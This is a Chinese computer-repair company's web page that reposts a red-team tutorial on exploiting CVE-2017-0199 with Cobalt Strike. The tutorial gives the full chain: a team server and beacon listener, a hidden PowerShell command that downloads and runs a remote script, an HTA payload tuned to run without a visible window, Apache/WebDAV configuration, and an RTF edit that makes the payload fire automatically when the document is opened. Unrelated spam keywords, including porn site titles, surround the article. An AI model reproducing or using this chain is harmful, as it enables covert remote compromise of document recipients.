国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
Cobalt Strike tutorial下針對CVE-2017-0199利用

作者: 佚名  日期:2017-05-02 16:49:07   來源: 本站整理

 在本文中,我們將解釋創建一個有效的概念RTF文件的基礎過程,該文件將執行Cobalt Strike Beacon有效載荷,而不需要用戶交互,也不需要終端彈出窗口,因為這可以證明在Red Team中非常有用。

請在下面簡要介紹相關步驟:

  1. Cobalt Strike 服務器將與偵聽信標一起設置,以便在受害計算機(在此實例Windows 8.1中實時啟動Windows Defender)時,從信標有效載荷接收連接。
  2. 將創建一個名為 exploit.rtf 文件的RTF ,指向一個名為 CVE-2017-0199_POC 的第二個RTF文件的OLE對象(該文件將只有一些POC文本)。
  3. 一旦 exploit.rtf 與 CVE-2017-0199_POC RTF文檔鏈接,該文件將被連接到使用的payload
  4. 該 exploit.rtf
  5. 無需用戶交互自動執行HTA進行修改。

Cobalt Strike設置和生成payload

為了能夠從執行的payload接收連接,需要以下步驟:

使用以下命令啟動Cobalt Strike Team Server:

./teamserver x.x.x.x password

使用該命令,運行默認5050端口上的Cobal Strike Team Server。為了能夠連接到服務器(使用與上一個命令設置的密碼),您將需要啟動客戶端:

java -jar cobaltstrike.jar

客戶端GUI啟動后,讓我們創建一個監聽,從” Cobalt Strike 菜單點擊“ Listeners :

Cobalt Strike -> Listeners

然后填寫所需的信息,如名稱,有效載荷,主機和端口,然后單擊 添加 。 從我們的場景中的以下圖像可以看出,使用了一個在端口4444上偵聽本地IP地址的 windows / beacon_http / reverse_http 有效載荷:

單擊 保存 以存儲設置。 繼續輸入您將使用的IP地址或任何解析的域名:

在此階段,可以添加任何解析為之前設置的IP地址的域。

一旦你點擊 確定 ‘開始的監聽器’將看起來像下面的截圖:

一旦監聽器啟動,我們將需要生成在受害機器上執行的有效載荷。從 Attacks -> Web Drive-by菜單中單擊“Scripted Web Delivery”,如下圖所示:

一旦彈出“ Scripted Web Delivery ”窗口,就會填寫所需的參數。您可以修改它們以滿足您的需求:

為了使腳本有效點擊 Launch :

這將在我們的主機上放一個名為“evil”的Powershell腳本,該腳本將在運行上一圖像所示命令的受害計算機上執行:

powershell.exe -nop -w hidden -c“IEX((new-object net.webclient).downloadstring('http://172.16.17.39:80/evil'))”

總結:

  • 端口4444上的監聽器已創建
  • 創建了一個反向連接指向我們的偵聽器的信標有效載荷

利用環境設置

在本節中,我們將介紹第2步和第3步(請參考簡介),以便將漏洞利用的環境設置為有效并且不需要用戶交互。

RTF OLE鏈接

我們需要執行的第一步是創建 CVE-2017-0199_POC RTF文檔,該文檔將是一個具有任意內容的簡單RTF文件。在我們的情景中,它將包括一個POC文本,如下圖所示:

創建一個帶有POC文本的簡單RTF

創建文件后,為方便起見,將其復制到本地安裝的Kali,因為我們需要為OLE鏈接過程準備好文件,這將在后續步驟中解釋。 為了文件 CVE-2017-0199_POC 被鏈接,我們將需要使用Apache服務,而這需要一些調整才能有效。

# mkdir /var/www/html/word/
# cp CVE-2017-0199_POC.rtf /var/www/html/word/

這將將以前創建的文檔復制到Apache的目錄中,以便將文檔提供給HTTP OLE鏈接。 OLE鏈接過程將涉及到由服務器發送的PROPFIND請求,從而有必要使WebDav啟用:

# a2enmod dav
# a2enmod dav_fs
# a2enmod dav_lock
# a2enmod headers

如果一切順利,您可以繼續編輯apache2.conf,以指示Apache有效地為RFT文件提供服務。

為此,請使用文本編輯器編輯 /etc/apache2/apache2.conf 文件,并在文件末尾添加以下行:

<Directory /var/www/html/word/>
Header set Content-Type “application/rtf”
</Directory>
<Directory>
Dav on
</Directory>

要使更改生效,請重新啟動Apache Web服務器

#service apache2 restart

一旦Apache重新啟動,我們可以通過幾個簡單的步驟繼續進行鏈接過程:

  • 用Word創建一個名為exploit.rtf的RTF文件
  • 從“插入”菜單中單擊“對象”,并將HTTP鏈接放入CVE-2017-0199_POC文檔中,并勾選“鏈接到文件”選項,如下圖所示

單擊 確定 并保存文件。然后,文件將在“exploit”會話中進行修改,以便在沒有任何用戶交互的情況下觸發有效載荷執行。

HTA payload創建

我們現在需要生成一個HTA有效載荷,或者簡單地放置一個由負責執行這些類型文件的Microsoft mshta 代理執行的代碼。

我們將修改HTA以下部分,以執行我們的有效載荷:

<html>
<head>
<script>var c= 'command' new ActiveXObject('WScript.Shell').Run(c);</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

要做到這一點,第一步是用我們要在受害機器上執行的Powershell命令替換’command’。

如前所述,命令如下:

powershell.exe -nop -w hidden -c“IEX((new-object net.webclient).downloadstring('http://172.16.17.39:80/evil'))”

所以修改后的內容現在將顯示為:

<html>
<head>
<script>var c= 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://172.16.17.39:80/evil\'))"'; new ActiveXObject('WScript.Shell').Run(c);</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

看起來似乎都很好,但是如果我們嘗試執行這個HTA,它會彈出一個powershell/命令提示符窗口,但是我們希望盡可能的隱身。通過進一步研究,我們發現將 Run(c) 字符串修改為 Run(c,0) 將導致我們的命令在沒有任何命令提示符/ powershell彈出窗口的情況下被執行。 所以最終的HTA有效載荷將如下:

<html>
<head>
<script>var c= 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://172.16.17.39:80/evil\'))"'; new ActiveXObject('WScript.Shell').Run(c,0);</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

現在需要用這個新創建的HTA有效載荷替換“ /var/www/html/word/CVE-2017-0199_POC.rtf ”文檔。

可以使用以下命令:

將HTA有效載荷保存為/var/www/html/word/payload.hta

# cp /var/www/html/word/payload.hta /var/www/html/word/ CVE-2017-0199_POC.rtf

為了使此更改生效并觸發有效載荷執行,我們將需要指示Apache將此文件作為RTF解析,而不是作為HTA。 要做到這一點,只需將 Content type 從“ application/rtf ”更改為“ application/hta”,即可將其更改為以前編輯的/etc/apache2/apache2.conf,然后重新啟動apache web服務器

總結:

  • exploit.rtf和CVE-2017-0199_POC.rtf 之間的OLE鏈接已創建
  • 將創建一個將執行Beacon有效負載的HTA,并將其替換為原始的 CVE-2017-0199_POC.rtf
  • Apache Web服務器被修改為將 /var/html/www/word 目錄中的任何RTF文件為HTA提供服務,以便執行HTA有效載荷

開發

為了使有效載荷即使沒有用戶交互也可以執行成功,,我們將需要修改以前創建的 exploit.rtf文件。 我們將添加的參數是“objupdate”,顧名思義,當打開惡意 exploit.rtf 時,將觸發自動更新/執行鏈接文件。 為了應用此更改將需要以下命令:

sed -ie ‘s/objautlink/objautlink\\objupdate/g’ exploit.rtf

exploit.rtf現在可以發送,它將觸發一個Beacon有效載荷,無需任何用戶交互即可執行終端,您可以從以下截圖和POC視頻中看到

exploit.rtf被打開,并且不需要用戶交互來觸發有效負載來執行

我們的監聽程序已經成功收到了一個反向HTTP連接:

殺軟警告

在我們的實驗室環境中,我們在Windows 8.1實例上執行有效負載,啟用Windows Defender實時保護。使用Windows Defender,該文件未被標記為惡意軟件。 但是,我們還在安裝了卡巴斯基的Small Office Security的Windows 7 SP1實例上嘗試了該文件。在這種環境下,卡巴斯基將我們的文件標記為惡意文件,并阻止有效載荷執行。

*參考來源: secforce ,轉載請注明來自MottoIN



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    亚洲欧美制服综合另类| 99re6在线视频精品免费| 国产女人18毛片水真多成人如厕 | 91久久精品国产91性色tv| 久久99成人| 国产亚洲精品久久久网站好莱| www.com黄色片| 亚洲男女一区二区三区| 风间由美一区二区av101| www.操操操.com| 国产又粗又猛又爽又黄的视频小说 | 欧美日韩国产在线播放网站| 狠狠爱综合网| 日本在线视频网| 亚洲国产精品欧美久久| 天天视频天天爽| 国产精品视频内| 日本韩国欧美国产| 欧美激情在线看| 国产成人av一区二区三区在线| 精品视频一二| 欧美激情护士| 九色网com| 精品欧美一区二区久久久久| 午夜在线视频免费观看| 在线不卡国产精品| 亚洲色图19p| 伊人狠狠色j香婷婷综合| xxxx成人| 成年人影院在线观看| 亚洲第一在线播放| 亚洲欧美在线精品| 精品丰满人妻无套内射| 日韩av不卡在线| 日韩一区二区免费高清| 91麻豆成人久久精品二区三区| 网友自拍一区| av黄色在线| 曰皮视频在线播放免费的| 国产对白videos麻豆高潮| 国产极品尤物在线| 国产精品高潮粉嫩av| 欧美日韩电影在线播放| 亚洲电影中文字幕在线观看| 在线综合视频| 精品久久国产一区| 婷婷午夜社区一区| 午夜在线观看91| 国产丰满美女做爰| av手机在线播放| 99久热在线精品视频| 国产精品96久久久久久| 日韩av在线一区二区| 一区二区日韩电影| 国内成人自拍视频| 97国产精品| 久久亚洲国产精品尤物| 色在线免费视频| 色偷偷网站视频| 精品黑人一区二区三区在线观看 | 91九色单男在线观看| 亚洲视频欧洲视频| 亚洲香蕉av在线一区二区三区| 欧美日韩免费看| 91亚洲国产成人精品一区二三| 国产精品九九| 欧美资源在线| 欧美第一精品| 狠狠入ady亚洲精品| 欧美aaa在线| 欧美片第1页综合| 日韩高清二区| 麻豆av在线免费观看| 22288色视频在线观看| 四虎www成人影院观看| 高清乱码免费看污| xxxx日本免费| 国产精品igao网网址不卡| 日韩国产小视频| 久久久神马电影| 日本欧美精品在线| 国产精品久久久久久久7电影| 亚洲free性xxxx护士hd| 91精品国产自产91精品| 在线观看久久av| 9.1国产丝袜在线观看| 97碰碰视频| 国产精品久久中文| 精品国产综合| 国产厕所精品在线观看| 日韩免费观看高清| 蜜桃91精品入口| 国产精品一区二区三区四区五区 | 中文字幕一区二区三区日韩精品| av资源网在线播放| 黄网页在线观看| 蜜芽tv福利在线视频| 啊啊啊好爽视频| 碰草在线视频| 欧美女人天堂| 四虎影视成人永久免费观看视频| 青青草娱乐视频| 色鬼7777久久| 成人黄色在线| 久久亚洲国产精品尤物| 日韩伦理视频| 999精品一区| 久久国产精品99精品国产| 日一区二区三区| 国产麻豆一区二区三区| 国产91在线播放精品| 日韩片欧美片| 成人黄色在线网站| ww亚洲ww在线观看国产| 在线看国产一区| 欧美日韩精品免费观看视频| 在线播放日韩精品| 国产综合欧美在线看| 欧美激情导航| 韩国黄色一级大片| 妞干网视频在线观看| 88av在线播放| 日韩在线视频免费看| 亚洲精品国产一区二| 最新中文字幕av专区| 福利视频一区| 日韩激情视频网站| 色综合久久九月婷婷色综合| 51精品国自产在线| 亚洲精品美女久久久| 亚洲人成网站777色婷婷| 99久久精品免费看国产四区| 日本视频一区在线观看| 青青草免费在线视频观看| 蜜桃无码一区二区三区| 国产在线拍揄自揄拍无码视频| 久久亚洲精品石原莉奈| 亚洲图片欧美在线| 日本激情一区二区三区| 韩国三级电影在线观看婷婷| 欧美18—20岁hd第一次| 超碰免费97在线观看| 蜜桃视频在线观看播放| 99精品国产99久久久久久福利| 午夜精品久久久久久| 日韩免费观看高清完整版在线观看| 亚洲欧美日韩直播| 国内精品国产三级国产在线专| 91青草视频久久| 在线观看免费看片| 五月天丁香激情| 免费黄色成年网站| 伊人久久大香线蕉综合影院首页| 大片网站久久| 美女久久久精品| 亚洲欧洲另类国产综合| 欧美日韩视频在线一区二区| 亚洲天堂av在线免费| 日韩欧美亚洲区| 日本一二三区在线| 国产精品18p| 天堂在线亚洲| 超碰免费在线播放| 午夜日韩影院| 91在线免费播放| 久久av.com| 久久精品国产第一区二区三区最新章节| 欧美图片自拍偷拍| 国内精品福利视频| 500福利第一精品导航| 日韩综合网站| 在线观看视频一区| 欧美资源一区| 欧美一级特黄视频| 欧美极品视频| 亚州综合一区| 又紧又大又爽精品一区二区| 亚洲欧美另类中文字幕| 在线免费观看成人网| 少妇按摩一区二区三区| 在线观看国产一区二区三区| 日韩福利一区二区| 日韩香蕉视频| 亚洲精品国产精品乱码不99按摩 | 色99中文字幕| 亚洲精品国产精品国自产网站按摩| 欧美性狂猛xxxxxbbbbb| 亚洲电影小说图| 好吊一区二区三区| 欧美精品一区二区三区很污很色的| 国产成人综合精品在线| 国产人妻黑人一区二区三区| 国产精品日日夜夜| 毛片免费在线观看| 秋霞电影网一区二区| 综合激情国产一区| 视频在线精品一区| 天天操天天干天天操天天干| 欧美日韩亚洲国内综合网| 精品一区视频|